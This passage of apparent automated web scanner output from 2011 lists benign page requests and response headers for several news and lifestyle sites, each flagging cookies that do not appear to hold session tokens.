HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 17:21:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/ Set-Cookie: GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Sun, 30 Jan 2011 18:21:40 GMT Content-Type: image/gif Content-Length: 49
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:11 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA08 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 31456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /relationships/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:17 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 37451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /relationships/staticslideshowglamour.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:19 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA13 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-home/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:09:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA10 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784>1=32067 HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:29 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA13 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 37466
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/family-parenting/article.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sat, 29 Jan 2011 23:47:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA12 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx Set-Cookie: MC1=V=3&GUID=e5a2e16a67154266a9d498fd513a08c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=2588A011AE014923A2AA5BE79447364F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/ Cache-Control: no-cache Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/new-year-new-you/video.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA12 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a1ed2a58c8c240e8aa192c9ab451625e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1078BE57F6E649E38B580A5D9F01AA70; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/your-money-today/article.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sat, 29 Jan 2011 23:47:23 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx Set-Cookie: MC1=V=3&GUID=0398126e49724201804ec2ac840e992d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=57CE9474CD8C417D817D0DE1275373E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/ Cache-Control: no-cache Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/your-money-today/video.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:22 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA14 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 18282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-look/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:11 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA12 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 36735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:14 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA10 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 48583
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-look/video/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:09:21 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA14 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 20440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: live.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:08:23 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Host,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=a4bc8d41ac71ec541f1bf853a146540d; expires=Sat, 25-Jan-2031 02:08:23 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:29 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA29 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 45759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 23:47:53 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA30 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 STATUS_CODE: NotFound Pragma: no-cache Set-Cookie: MC1=V=3&GUID=0af244c7b84341db94fa63f78ec59843; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=7CDA6FC0BCE8438688C10A27DAA3A3FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:53 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 6288
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gas-traffic.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:09:28 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA27 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 44553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hourly.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:52 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA25 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 52446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies-events.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:43 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA28 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 59606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:29 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA32 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 45752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /restaurants.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:45 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA31 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sports.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:41 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA27 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 94929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ten-day.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:49 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA29 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49042
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /weather.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA30 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 48963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
